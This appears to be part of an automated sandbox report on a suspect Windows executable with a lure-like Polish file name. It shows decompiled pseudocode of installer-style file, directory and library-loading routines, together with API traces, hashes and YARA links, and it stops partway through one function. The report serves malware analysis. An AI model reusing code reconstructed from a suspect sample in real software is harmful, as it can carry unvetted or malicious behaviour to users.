							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004035BA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                  0x00401f84
                                                  0x00401f84
                                                  0x00401f89
                                                  0x00401f90
                                                  0x0040204c
                                                  0x00402197
                                                  0x00402197
                                                  0x004028be
                                                  0x004028c1
                                                  0x004028cd
                                                  0x004028cd
                                                  0x00401f9f
                                                  0x00401fa9
                                                  0x00401fac
                                                  0x00401fbb
                                                  0x00401fbf
                                                  0x00401fc5
                                                  0x00401fc9
                                                  0x00402045
                                                  0x00000000
                                                  0x00402045
                                                  0x00401fcb
                                                  0x00401fd5
                                                  0x00401fd9
                                                  0x0040201d
                                                  0x00401fdb
                                                  0x00401fde
                                                  0x00401fe1
                                                  0x00402011
                                                  0x00401fe3
                                                  0x00401fe6
                                                  0x00401fef
                                                  0x00401ff1
                                                  0x00401ff1
                                                  0x00401fef
                                                  0x00401fe1
                                                  0x00402025
                                                  0x0040203a
                                                  0x0040203a
                                                  0x00000000
                                                  0x00402025
                                                  0x00401faf
                                                  0x00401fb5
                                                  0x00401fb9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                                                    • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041F64C,747DEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                    • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041F64C,747DEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                    • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041F64C,747DEA30), ref: 00404F0F
                                                    • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2987980305-0
                                                  • Opcode ID: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                                  • Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
                                                  • Opcode Fuzzy Hash: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                                  • Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E004015B3(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040574E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056E5(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053F2(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040540F(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405375(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405BC7("C:\\Users\\engineer\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                  0x004015b3
                                                  0x004015ba
                                                  0x004015bd
                                                  0x004015c2
                                                  0x004015c6
                                                  0x004015c8
                                                  0x004015d0
                                                  0x004015d2
                                                  0x004015d4
                                                  0x004015d8
                                                  0x004015db
                                                  0x004015f3
                                                  0x004015f4
                                                  0x004015dd
                                                  0x004015dd
                                                  0x004015e0
                                                  0x00000000
                                                  0x004015eb
                                                  0x004015ec
                                                  0x004015ec
                                                  0x004015e0
                                                  0x004015fb
                                                  0x00401602
                                                  0x0040160f
                                                  0x0040160f
                                                  0x00401604
                                                  0x00401605
                                                  0x0040160d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040160d
                                                  0x00401602
                                                  0x00401612
                                                  0x00401615
                                                  0x00401617
                                                  0x00401618
                                                  0x004015c8
                                                  0x0040161f
                                                  0x0040164a
                                                  0x00402197
                                                  0x00401621
                                                  0x00401623
                                                  0x0040162e
                                                  0x00401634
                                                  0x0040163c
                                                  0x00401642
                                                  0x00401642
                                                  0x0040163c
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                    • Part of subcall function 0040574E: CharNextA.USER32(00405500,?,0042B4A8,00000000,004057B2,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
                                                    • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                                                    • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                    • Part of subcall function 00405375: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 1892508949-1104044542
                                                  • Opcode ID: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                                  • Instruction ID: f91ea4ffc010c5324243c64a5f93d27bb3485e0f7fec8187872c5a269388ad6c
                                                  • Opcode Fuzzy Hash: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                                  • Instruction Fuzzy Hash: F011EB35504141ABDF317FA55D419BF67B4E992324728063FF592722D2C63C4942AA2F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x42ec50; // 0x79f41c
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e40c =  *0x42e40c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e40c, 0x7530,  *0x42e3f4), 0);
					}
				}
				return 0;
			}












                                                  0x0040138a
                                                  0x004013fa
                                                  0x00401392
                                                  0x0040139b
                                                  0x004013a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004013a2
                                                  0x004013a3
                                                  0x004013ad
                                                  0x00000000
                                                  0x00401404
                                                  0x004013b0
                                                  0x004013b7
                                                  0x004013bd
                                                  0x004013be
                                                  0x004013c0
                                                  0x004013c2
                                                  0x004013b9
                                                  0x004013b9
                                                  0x004013ba
                                                  0x004013ba
                                                  0x004013c9
                                                  0x004013cb
                                                  0x004013f4
                                                  0x004013f4
                                                  0x004013c9
                                                  0x00000000

                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                                  • Instruction ID: 74927b77398f0d82d02f0f32bcc48ccf03ca760f88dcf9e2e40121dab22ba05a
                                                  • Opcode Fuzzy Hash: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                                  • Instruction Fuzzy Hash: 4901F431B242209BE7195B399C09B6A3698E710328F10863BF851F72F1D678DC039B4D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405F57, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405F57(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EE9(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                  0x00405f5f
                                                  0x00405f62
                                                  0x00405f69
                                                  0x00405f71
                                                  0x00405f7d
                                                  0x00000000
                                                  0x00405f84
                                                  0x00405f74
                                                  0x00405f7b
                                                  0x00000000
                                                  0x00405f8c
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                    • Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32 ref: 00405F00
                                                    • Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
                                                    • Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                  • Instruction ID: bbbe084413d2e6f7ef046b623ea8b92179420db3b6db08e2e7fdeef9d7d4980c
                                                  • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                  • Instruction Fuzzy Hash: 5DE08C32B08A12BAD6109B719D0497B72ACDEC8640300097EF955F6282D738AC11AAA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040589E, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E0040589E(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                  0x004058a2
                                                  0x004058af
                                                  0x004058c4
                                                  0x004058ca

                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,80000000,00000003), ref: 004058A2
                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                  • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                  • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                  • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040587F, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040587F(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                  0x00405883
                                                  0x0040588c
                                                  0x00000000
                                                  0x00405895
                                                  0x0040589b

                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(?,0040568A,?,?,?), ref: 00405883
                                                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405895
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                  • Instruction ID: cb5a672fe6ba1e8618a417a0682e77d28f0f111bf9a29bd8adb2d3f05be15d2c
                                                  • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                  • Instruction Fuzzy Hash: FDC04C71C08501ABD6016B34EF0DC5F7B66EB50322B14CB35F469A01F0C7315C66DA2A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004053F2, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004053F2(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                  0x004053f8
                                                  0x00405400
                                                  0x00000000
                                                  0x00405406
                                                  0x00000000

                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004053F8
                                                  • GetLastError.KERNEL32 ref: 00405406
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                  • Instruction ID: 813393d6953da14087893f37eb662e151031eda4d181b9a341b076b840c4c01a
                                                  • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                  • Instruction Fuzzy Hash: 27C04C30619502DAD7105B31DD08B5B7E50AB50742F219535A506E11E1D6349492D93E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004030B0, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004030B0(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                  0x004030b4
                                                  0x004030c7
                                                  0x004030cf
                                                  0x00000000
                                                  0x004030d6
                                                  0x00000000
                                                  0x004030d8

                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDD,000000FF,00000004,00000000,00000000,00000000), ref: 004030C7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                  • Instruction ID: 90557e19d7482b95f4dd5f96256efcc3496d5940ec1e4df6b8622c0cc682be59
                                                  • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                  • Instruction Fuzzy Hash: A1E08C32201118BBCF205E519D00AA73B9CEB043A2F008032BA18E51A0D630EA11ABA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10004E8A, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 25%
                                                  			E10004E8A() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E10004EF1(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}








                                                  0x10004e8a
                                                  0x10004e8c
                                                  0x10004e8e
                                                  0x10004e90
                                                  0x10004e98

                                                  APIs
                                                  • _doexit.LIBCMT ref: 10004E90
                                                    • Part of subcall function 10004EF1: __lock.LIBCMT ref: 10004EFF
                                                    • Part of subcall function 10004EF1: RtlDecodePointer.NTDLL(10014600,0000001C,10004E85,?,00000001,00000000,?,10004C62,000000FF,?,10005E97,00000011,?,?,10004A1D,0000000D), ref: 10004F3E
                                                    • Part of subcall function 10004EF1: DecodePointer.KERNEL32(?,10004C62,000000FF,?,10005E97,00000011,?,?,10004A1D,0000000D,100145B0,00000008,10004AEC,?,00000001), ref: 10004F4F
                                                    • Part of subcall function 10004EF1: EncodePointer.KERNEL32(00000000,?,10004C62,000000FF,?,10005E97,00000011,?,?,10004A1D,0000000D,100145B0,00000008,10004AEC,?,00000001), ref: 10004F68
                                                    • Part of subcall function 10004EF1: DecodePointer.KERNEL32(-00000004,?,10004C62,000000FF,?,10005E97,00000011,?,?,10004A1D,0000000D,100145B0,00000008,10004AEC,?,00000001), ref: 10004F78
                                                    • Part of subcall function 10004EF1: EncodePointer.KERNEL32(00000000,?,10004C62,000000FF,?,10005E97,00000011,?,?,10004A1D,0000000D,100145B0,00000008,10004AEC,?,00000001), ref: 10004F7E
                                                    • Part of subcall function 10004EF1: DecodePointer.KERNEL32(?,10004C62,000000FF,?,10005E97,00000011,?,?,10004A1D,0000000D,100145B0,00000008,10004AEC,?,00000001), ref: 10004F94
                                                    • Part of subcall function 10004EF1: DecodePointer.KERNEL32(?,10004C62,000000FF,?,10005E97,00000011,?,?,10004A1D,0000000D,100145B0,00000008,10004AEC,?,00000001), ref: 10004F9F
                                                    • Part of subcall function 10004EF1: __initterm.LIBCMT ref: 10004FC7
                                                    • Part of subcall function 10004EF1: __initterm.LIBCMT ref: 10004FD8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                                  • String ID:
                                                  • API String ID: 3712619029-0
                                                  • Opcode ID: 20a20f608ea4bc6c94e18f730bbbe563946a4bfee6b1cba253202f95a216a98f
                                                  • Instruction ID: df00a98e940c2f5b518221b3c0e3c8087063226d44fc96380071309cb11cc2a3
                                                  • Opcode Fuzzy Hash: 20a20f608ea4bc6c94e18f730bbbe563946a4bfee6b1cba253202f95a216a98f
                                                  • Instruction Fuzzy Hash: B7A002A9BD434461FC6091506C43F5461016750F41FD50060BB082C9C5B8C6265C445B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004030E2, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004030E2(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                  0x004030f0
                                                  0x004030f6

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,00027BE4), ref: 004030F0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                  • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                  • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                  • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00404802, Relevance: 67.0, APIs: 33, Strings: 5, Instructions: 478windowmemoryCOMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E00404802(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
